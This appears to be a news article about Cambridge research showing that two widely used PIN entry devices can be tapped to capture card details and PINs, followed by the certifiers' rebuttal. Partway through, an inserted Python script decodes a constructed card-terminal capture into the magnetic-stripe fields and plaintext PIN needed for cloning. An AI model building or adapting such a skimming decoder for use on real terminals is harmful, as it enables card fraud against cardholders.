Researchers at the University of Cambridge’s Computer Laboratory
in the UK have created a furore with their assertion that two
widely deployed PIN entry devices (PEDs) are not as secure as the
banking industry claims. According to the researchers, their
empirical study revealed that the devices, French payment systems
vendor Ingenico’s i3300 and US payment systems vendor VeriFone’s
Dione Xtreme, fail to adequately protect customers’ card details
and PINs.
Researchers Ross Anderson, Saar Drimer and Steven J Murdoch
explained that fraudsters can easily attach to the PED what they
term “a tap” that records PIN and account details as they are
transmitted between the card and the PIN pad. With this
information, fraudsters can create a counterfeit card with no chip
but a correct magnetic stripe, which can be used in shops in
countries that do not yet use chip and PIN. Such a fake card can
also be used to withdraw cash from ATMs abroad, because the
fraudster has the correct PIN recorded.
“We have successfully demonstrated this attack, on a real
terminal borrowed from a merchant,” said Murdoch. “Criminals are
already using techniques similar to these to defraud British
customers, with losses in one case alone claimed to be in eight
figures.” He added the technical sophistication required to carry
out this attack is low. In addition, the tap would not normally be
visible to customers and in the case of the Ingenico i3300 it could
be totally enclosed by the device.
Not tamper-proof
Notably, the researchers pointed out that although the PEDs are
supposed to be tamper-resistant, in practice they are not. The
designers of the PEDs they examined failed to stop simple attacks,
and the devices actually have “curiously placed holes and
contacts” that make the tap attacks even easier.
Expanding on their findings, Drimer added: “The vulnerabilities
we found were caused by a series of design errors by the
manufacturers. They can be exploited because Britain’s banks set up
the chip and PIN in an insecure way.” He explained that the Dione
Xtreme and Ingenico i3300 PEDs fail to protect the communication
path that carries the card data from the card to the PIN pad and
the PIN from the PIN pad back to the card: both exchanges take
place unencrypted, so anything wired into that path can read the
card details and the PIN directly.
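As an added example (not code from the article or from the Cambridge researchers), the script below shows what a passive tap on that unencrypted card-to-PED link yields once the recorded traffic is decoded. It assumes the EMV and ISO 7816 encodings: a READ RECORD response carrying a BER-TLV template with tag 57 (Track 2 Equivalent Data, i.e. the magnetic-stripe contents), and a VERIFY command (CLA 00, INS 20, P2 80) whose data field is a plaintext ISO 9564 format-2 PIN block. The capture is constructed for the example and the PAN is a standard test number, not a real card.

```python
"""Decode what a passive tap on an unencrypted card-to-PED link would record.

Added illustration; not code from the article or from the Cambridge research.
It assumes the EMV / ISO 7816 encodings: a READ RECORD response carrying a
BER-TLV template with tag 57 (Track 2 Equivalent Data), and a VERIFY command
(CLA 00, INS 20, P2 80) whose data field is a plaintext ISO 9564 format-2 PIN
block. The capture below is constructed; the PAN is a standard test number.
"""
from typing import Dict, List, Optional, Tuple

# Constructed capture: (direction, hex) as a serial tap might log it.
# "C" = command PED -> card, "R" = response card -> PED.
TRACK2_HEX = "4111111111111111" + "D" + "2512" + "201" + "00000000000" + "F"
READ_RECORD_RESP = "7018" + "5712" + TRACK2_HEX + "5F340101" + "9000"
SAMPLE_CAPTURE: List[Tuple[str, str]] = [
    ("C", "00B2010C00"),                       # READ RECORD, SFI 1, record 1
    ("R", READ_RECORD_RESP),                   # record template + SW 9000
    ("C", "0020008008" + "241234FFFFFFFFFF"),  # VERIFY, plaintext PIN 1234
    ("R", "9000"),                             # card accepts the PIN
]


def parse_tlv(data: bytes) -> Dict[str, bytes]:
    """Flatten a BER-TLV blob into {tag_hex: value}, descending into templates."""
    out: Dict[str, bytes] = {}
    i = 0
    while i < len(data):
        if data[i] in (0x00, 0xFF):          # inter-object padding
            i += 1
            continue
        start = i
        first = data[i]
        i += 1
        if first & 0x1F == 0x1F:             # multi-byte tag (e.g. 5F34)
            while data[i] & 0x80:
                i += 1
            i += 1
        tag = data[start:i].hex().upper()
        length = data[i]
        i += 1
        if length & 0x80:                    # long-form length
            n = length & 0x7F
            length = int.from_bytes(data[i:i + n], "big")
            i += n
        value = data[i:i + length]
        i += length
        if first & 0x20:                     # constructed: recurse into template
            out.update(parse_tlv(value))
        else:
            out[tag] = value
    return out


def decode_track2(value: bytes) -> Dict[str, str]:
    """Split tag 57 into the fields a magnetic-stripe clone would need."""
    digits = value.hex().upper().rstrip("F")  # drop odd-length padding nibble
    pan, rest = digits.split("D", 1)          # 'D' is the field separator
    return {
        "pan": pan,
        "expiry_yymm": rest[:4],
        "service_code": rest[4:7],
        "discretionary": rest[7:],
    }


def decode_plaintext_pin(cmd: bytes) -> Optional[str]:
    """Return the PIN from a plaintext VERIFY, or None for anything else."""
    if len(cmd) < 5 or cmd[0] != 0x00 or cmd[1] != 0x20:
        return None
    if cmd[3] != 0x80:                        # 0x88 would be an enciphered block
        return None
    lc = cmd[4]
    block = cmd[5:5 + lc]
    if lc != 8 or len(block) != 8 or block[0] >> 4 != 0x2:
        return None                           # not an ISO 9564 format-2 block
    pin_len = block[0] & 0x0F
    if not 4 <= pin_len <= 12:
        return None
    return block[1:].hex()[:pin_len]


def harvest(capture: List[Tuple[str, str]]) -> Dict[str, Optional[str]]:
    """Walk a capture and collect stripe-clone fields plus the PIN."""
    found: Dict[str, Optional[str]] = {
        "pan": None, "expiry_yymm": None, "service_code": None,
        "discretionary": None, "pin": None,
    }
    for direction, hexdata in capture:
        raw = bytes.fromhex(hexdata)
        if direction == "R" and len(raw) > 2 and raw.endswith(b"\x90\x00"):
            objects = parse_tlv(raw[:-2])     # strip the status word
            if "57" in objects:
                found.update(decode_track2(objects["57"]))
        elif direction == "C":
            pin = decode_plaintext_pin(raw)
            if pin is not None:
                found["pin"] = pin
    return found


if __name__ == "__main__":
    for key, value in harvest(SAMPLE_CAPTURE).items():
        print(f"{key:14} {value}")
```

The P2 check in `decode_plaintext_pin` marks the practitioner's caveat: a terminal and card using offline enciphered PIN verification (VERIFY with P2 = 0x88) would not hand the PIN to such a tap in the clear, whereas the Track 2 Equivalent Data read from the chip is exposed regardless unless the card-to-terminal link itself is protected.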

Their findings call into question the system under which bank
terminals are certified, stressed the researchers. According to
them, Visa and UK payments industry body APACS had not found the
flaws the researchers identified and had certified the two devices
as secure.
The researchers added that Visa and APACS had claimed the devices
were evaluated under the Common Criteria (CC), an international
evaluation scheme administered in the UK by the Government
Communications Headquarters (GCHQ). GCHQ, however, said it had not
heard of the work and that the devices were never certified under
the CC. Visa and APACS have refused to disclose the evaluation
report, the researchers added.
GCHQ, the UK’s intelligence agency, is charged with, among other
things, securing the country’s critical communications and
information systems. The relevant government bodies of France,
Germany, the Netherlands, Spain and the UK support the CC
certification scheme.
Concluding, Anderson, professor of security engineering at
Cambridge University, said: “The lessons we learned are not limited
to banking. Other fields, from voting machines to electronic
medical record systems, suffer from the same combination of stupid
mistakes, sham evaluations and obstructive authorities. Where the
public are forced to rely on the security of a system, we need
honest security evaluations that are published and subjected to
peer review.”
Disagreement with findings
In its response to the researchers’ findings, APACS stated: “The
evaluation process did not fail. The devices passed at the level of
protection identified in the criteria and against the stated attack
potential.” APACS also disagreed with the researchers’ assertion
that a tap could be easily attached to the PEDs. “This type of
attack requires far greater effort and engineering to execute than
you currently estimate,” stressed APACS.